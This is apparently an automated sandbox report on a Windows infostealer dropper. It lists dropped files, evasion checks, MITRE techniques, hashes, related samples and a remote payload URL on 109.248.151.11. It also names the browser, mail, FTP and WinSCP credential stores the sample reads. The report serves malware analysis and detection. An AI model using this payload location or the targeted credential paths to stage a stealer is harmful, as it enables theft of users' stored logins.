        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\malningerne.bogJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\monodomous.kalJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\ornery.cemJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\podagrist.refJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\soliloquium.borJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\thoroughwort.retJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand\torminal.wesJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
        Source: C:\Users\user\Desktop\99200032052824.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Source: C:\Users\user\Desktop\99200032052824.bat.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
        Source: C:\Users\user\Desktop\99200032052824.bat.exeMemory allocated: 120000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeMemory allocated: 37610000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeMemory allocated: 37530000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\99200032052824.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Users\user\Desktop\99200032052824.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
        Source: C:\Users\user\Desktop\99200032052824.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_00405768
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_004062A3 FindFirstFileA,FindClose,5_2_004062A3
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_004026FE FindFirstFileA,5_2_004026FE
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,9_2_00405768
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_004026FE FindFirstFileA,9_2_004026FE
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 9_2_004062A3 FindFirstFileA,FindClose,9_2_004062A3
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeAPI call chain: ExitProcess graph end nodegraph_5-4690
        Source: C:\Users\user\Desktop\99200032052824.bat.exeAPI call chain: ExitProcess graph end nodegraph_5-4511
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_00402340 LdrInitializeThunk,GetPrivateProfileStringA,5_2_00402340
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_73A31A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,5_2_73A31A98
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeProcess created: C:\Users\user\Desktop\99200032052824.bat.exe "C:\Users\user\Desktop\99200032052824.bat.exe"Jump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeQueries volume information: C:\Users\user\Desktop\99200032052824.bat.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeCode function: 5_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040320C
        Source: C:\Users\user\Desktop\99200032052824.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: C:\Users\user\Desktop\99200032052824.bat.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
        Source: C:\Users\user\Desktop\99200032052824.bat.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
        Source: Yara matchFile source: 00000009.00000002.1301032668397.0000000037647000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Disable or Modify Tools
        2
        OS Credential Dumping
        4
        File and Directory Discovery
        Remote Services1
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Native API
        1
        Registry Run Keys / Startup Folder
        1
        Access Token Manipulation
        1
        Deobfuscate/Decode Files or Information
        1
        Credentials in Registry
        36
        System Information Discovery
        Remote Desktop Protocol2
        Data from Local System
        1
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
        Process Injection
        2
        Obfuscated Files or Information
        Security Account Manager32
        Security Software Discovery
        SMB/Windows Admin Shares1
        Email Collection
        2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        Registry Run Keys / Startup Folder
        1
        DLL Side-Loading
        NTDS23
        Virtualization/Sandbox Evasion
        Distributed Component Object Model1
        Clipboard Data
        12
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Masquerading
        LSA Secrets1
        System Network Configuration Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts23
        Virtualization/Sandbox Evasion
        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Access Token Manipulation
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
        Process Injection
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        99200032052824.bat.exe13%ReversingLabs
        99200032052824.bat.exe20%VirustotalBrowse
        99200032052824.bat.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dll0%VirustotalBrowse
        No Antivirus matches
        SourceDetectionScannerLabelLink
        ip-api.com0%VirustotalBrowse
        SourceDetectionScannerLabelLink
        http://109.248.151.11/LZJRCXHEEshk185.bin0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
        http://ip-api.com/line/?fields=hosting0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_ErrorError0%VirustotalBrowse
        http://ip-api.com/line/?fields=hosting0%VirustotalBrowse
        http://nsis.sf.net/NSIS_Error0%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        ip-api.com
        208.95.112.1
        truetrueunknown
        NameMaliciousAntivirus DetectionReputation
        http://109.248.151.11/LZJRCXHEEshk185.binfalse
        • Avira URL Cloud: safe
        unknown
        http://ip-api.com/line/?fields=hostingfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://nsis.sf.net/NSIS_Error99200032052824.bat.exefalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://nsis.sf.net/NSIS_ErrorError99200032052824.bat.exe, 00000005.00000000.1295915464666.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 99200032052824.bat.exe, 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        208.95.112.1
        ip-api.comUnited States
        53334TUT-ASUStrue
        109.248.151.11
        unknownRussian Federation
        52048DATACLUBLVfalse
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1447846
        Start date and time:2024-05-27 09:12:50 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 15m 37s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
        Run name:Suspected Instruction Hammering
        Number of analysed new started processes analysed:11
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:99200032052824.bat.exe
        Detection:MAL
        Classification:mal96.troj.spyw.evad.winEXE@3/23@1/2
        EGA Information:
        • Successful, ratio: 50%
        HCA Information:
        • Successful, ratio: 92%
        • Number of executed functions: 116
        • Number of non-executed functions: 69
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): assets.msn.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, api.msn.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target 99200032052824.bat.exe, PID 7240 because it is empty
        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.
        No simulations
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        208.95.112.1PO_27052024.exeGet hashmaliciousAgentTeslaBrowse
        • ip-api.com/line/?fields=hosting
        Reiven RFQ-27-05-2024.exeGet hashmaliciousAgentTeslaBrowse
        • ip-api.com/line/?fields=hosting
        ev1NIvTd6f.exeGet hashmaliciousUnknownBrowse
        • /json/
        https://mega.nz/file/wncXiYhZ#ABJEpmoiGH0hIeVVKQy7V_ALtGclDnJ4rFrDjwZ8kDEGet hashmaliciousDCRatBrowse
        • ip-api.com/line/?fields=hosting
        uChcvn3L6R.exeGet hashmaliciousDCRatBrowse
        • ip-api.com/line/?fields=hosting
        uChcvn3L6R.exeGet hashmaliciousDCRatBrowse
        • ip-api.com/line/?fields=hosting
        SecuriteInfo.com.FileRepMalware.1834.13764.exeGet hashmaliciousDiscord Token Stealer, XWormBrowse
        • ip-api.com/line/?fields=hosting
        NFs_468.msiGet hashmaliciousVMdetectBrowse
        • ip-api.com/json/
        z23mypdfscanner-invoice3535.batGet hashmaliciousAgentTeslaBrowse
        • ip-api.com/line/?fields=hosting
        2aFb7hE00o.exeGet hashmaliciousAgentTeslaBrowse
        • ip-api.com/line/?fields=hosting
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        ip-api.comPO_27052024.exeGet hashmaliciousAgentTeslaBrowse
        • 208.95.112.1
        Reiven RFQ-27-05-2024.exeGet hashmaliciousAgentTeslaBrowse
        • 208.95.112.1
        ev1NIvTd6f.exeGet hashmaliciousUnknownBrowse
        • 208.95.112.1
        https://mega.nz/file/wncXiYhZ#ABJEpmoiGH0hIeVVKQy7V_ALtGclDnJ4rFrDjwZ8kDEGet hashmaliciousDCRatBrowse
        • 208.95.112.1
        uChcvn3L6R.exeGet hashmaliciousDCRatBrowse
        • 208.95.112.1
        uChcvn3L6R.exeGet hashmaliciousDCRatBrowse
        • 208.95.112.1
        SecuriteInfo.com.FileRepMalware.1834.13764.exeGet hashmaliciousDiscord Token Stealer, XWormBrowse
        • 208.95.112.1
        NFs_468.msiGet hashmaliciousVMdetectBrowse
        • 208.95.112.1
        z23mypdfscanner-invoice3535.batGet hashmaliciousAgentTeslaBrowse
        • 208.95.112.1
        2aFb7hE00o.exeGet hashmaliciousAgentTeslaBrowse
        • 208.95.112.1
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        TUT-ASUSPO_27052024.exeGet hashmaliciousAgentTeslaBrowse
        • 208.95.112.1
        Reiven RFQ-27-05-2024.exeGet hashmaliciousAgentTeslaBrowse
        • 208.95.112.1
        ev1NIvTd6f.exeGet hashmaliciousUnknownBrowse
        • 208.95.112.1
        https://mega.nz/file/wncXiYhZ#ABJEpmoiGH0hIeVVKQy7V_ALtGclDnJ4rFrDjwZ8kDEGet hashmaliciousDCRatBrowse
        • 208.95.112.1
        uChcvn3L6R.exeGet hashmaliciousDCRatBrowse
        • 208.95.112.1
        uChcvn3L6R.exeGet hashmaliciousDCRatBrowse
        • 208.95.112.1
        SecuriteInfo.com.FileRepMalware.1834.13764.exeGet hashmaliciousDiscord Token Stealer, XWormBrowse
        • 208.95.112.1
        NFs_468.msiGet hashmaliciousVMdetectBrowse
        • 208.95.112.1
        z23mypdfscanner-invoice3535.batGet hashmaliciousAgentTeslaBrowse
        • 208.95.112.1
        2aFb7hE00o.exeGet hashmaliciousAgentTeslaBrowse
        • 208.95.112.1
        DATACLUBLVRigtighed.exeGet hashmaliciousGuLoaderBrowse
        • 46.183.222.32
        HSBC PAYMENT CONFIRMATION COPY.PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
        • 46.183.222.32
        MB263350411AE.exeGet hashmaliciousNanocoreBrowse
        • 109.248.151.181
        PEDIDO DE COMPRA I122825.exeGet hashmaliciousRemcosBrowse
        • 46.183.223.69
        FFR.exeGet hashmaliciousRemcosBrowse
        • 46.183.223.35
        SecuriteInfo.com.Trojan.DownLoader46.63573.25866.32524.exeGet hashmaliciousRemcos, AgentTesla, DBatLoaderBrowse
        • 109.248.151.108
        HSBC COPY.PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
        • 46.183.222.32
        34003198.pdf.jsGet hashmaliciousWSHRat, VjW0rmBrowse
        • 109.248.151.106
        https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5Get hashmaliciousRemcosBrowse
        • 46.183.222.118
        Trommels.jsGet hashmaliciousWSHRATBrowse
        • 46.183.223.46
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Users\user\AppData\Local\Temp\nsvDCDA.tmp\System.dllINQUIRY#46789-MAY_24_PRODUCTS.exeGet hashmaliciousGuLoaderBrowse
          #U4f01#U4e1a#U7a0e#U52a1#U7a3d#U67e5#U540d#U5355#U67e5#U8be2client_silent_S3471755167_.exeGet hashmaliciousUnknownBrowse
            #U4f01#U4e1a#U7a0e#U52a1#U7a3d#U67e5#U540d#U5355#U67e5#U8be2client_silent_S3471755167_.exeGet hashmaliciousUnknownBrowse
              https://github.com/jmeubank/tdm-gcc/releases/download/v10.3.0-tdm64-2/tdm64-gcc-10.3.0-2.exeGet hashmaliciousUnknownBrowse
                PulseUpgradeHelperInstaller.msiGet hashmaliciousUnknownBrowse
                  VESSEL PARTICULARS & INSTRUCTIONS_docx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    VESSEL PARTICULARS & INSTRUCTIONS_docx.exeGet hashmaliciousGuLoaderBrowse
                      090100003400224.exeGet hashmaliciousGuLoaderBrowse
                        VESSEL PARTICULARS & INSTRUCTIONS_docx.exeGet hashmaliciousGuLoaderBrowse
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):39
                          Entropy (8bit):3.994004065616087
                          Encrypted:false
                          SSDEEP:3:bMQGHbS9n:fG7Gn
                          MD5:DC764DAEA004E907E2A4076DC2E81DCE
                          SHA1:64CC2F14C8426031E8FE9995DA24887FF5BEEC97
                          SHA-256:8A3DD54ACAC47298AFA45E7048A9297F897E35CB351E511FBE5A421B1ED6523D
                          SHA-512:F03E8C65E1974E8BC1608E292A9898054C791B5E8505B8BBD5F9EB832CD414C3FB19F7E328286984CC73A07937D60731DD00F20C3E31DB77245A2F178E5BF257
                          Malicious:false
                          Reputation:low
                          Preview:[substantify]..praisably=intransitive..
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):51
                          Entropy (8bit):4.7896890672920085
                          Encrypted:false
                          SSDEEP:3:ayWFXQLQIfLBJXlFGfv:bmXQkIPeH
                          MD5:F09045A90C78C38BE8C9CBABC14C5AF5
                          SHA1:0EC854B7F04157763C40DCB430DE981380BA82CF
                          SHA-256:EB547F6C09B10F5824FA51272FE7EBDA82A2942209E8C795250A3A71A73789E3
                          SHA-512:E10CA8614F3BD2FED1CFD752FCED2754853DA013CBA37E9258F03ECA34F5C0E9DA524989E5234349935D9BA47CF63034D73A8275D61EB9B4B7D1D90531F9981C
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:[Loading]..Startup=user32::EnumWindows(i r2 ,i 0)..
                          Process:C:\Users\user\Desktop\99200032052824.bat.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):11776
                          Entropy (8bit):5.825582780706362
                          Encrypted:false
                          SSDEEP:192:yPtkiQJr7V9r3Ftr87NfwXQ6whlgi62V7i77blbTc4DI:N7Vxr8IgLgi3sVc4
                          MD5:FBE295E5A1ACFBD0A6271898F885FE6A
                          SHA1:D6D205922E61635472EFB13C2BB92C9AC6CB96DA
                          SHA-256:A1390A78533C47E55CC364E97AF431117126D04A7FAED49390210EA3E89DD0E1
                          SHA-512:2CB596971E504EAF1CE8E3F09719EBFB3F6234CEA5CA7B0D33EC7500832FF4B97EC2BBE15A1FBF7E6A5B02C59DB824092B9562CD8991F4D027FEAB6FD3177B06
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          • Antivirus: Virustotal, Detection: 0%, Browse
                          Joe Sandbox View:
                          • Filename: INQUIRY#46789-MAY_24_PRODUCTS.exe, Detection: malicious, Browse
                          • Filename: #U4f01#U4e1a#U7a0e#U52a1#U7a3d#U67e5#U540d#U5355#U67e5#U8be2client_silent_S3471755167_.exe, Detection: malicious, Browse
                          • Filename: #U4f01#U4e1a#U7a0e#U52a1#U7a3d#U67e5#U540d#U5355#U67e5#U8be2client_silent_S3471755167_.exe, Detection: malicious, Browse
                          • Filename: , Detection: malicious, Browse
                          • Filename: PulseUpgradeHelperInstaller.msi, Detection: malicious, Browse
